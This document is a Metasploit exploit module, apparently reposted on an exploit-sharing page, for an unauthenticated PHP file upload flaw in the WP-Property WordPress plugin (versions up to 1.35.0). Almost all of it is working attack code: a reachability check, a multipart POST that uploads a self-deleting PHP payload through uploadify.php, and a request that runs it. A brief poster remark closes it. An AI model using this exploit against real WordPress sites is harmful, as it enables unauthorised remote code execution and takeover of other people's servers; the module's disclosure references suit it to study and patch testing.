WordPress WP-Property PHP File Upload Vulnerability

Posted on 2013-1-4 19:51:30
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # A 200 response only shows that uploadify.php is reachable, hence "Appears".
  def check
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Multipart body: the file goes in "Filedata", the destination directory in "folder".
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The response body is used as the path of the stored file.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end

Don't ask me what this is or how to use it. I'm talking about msf.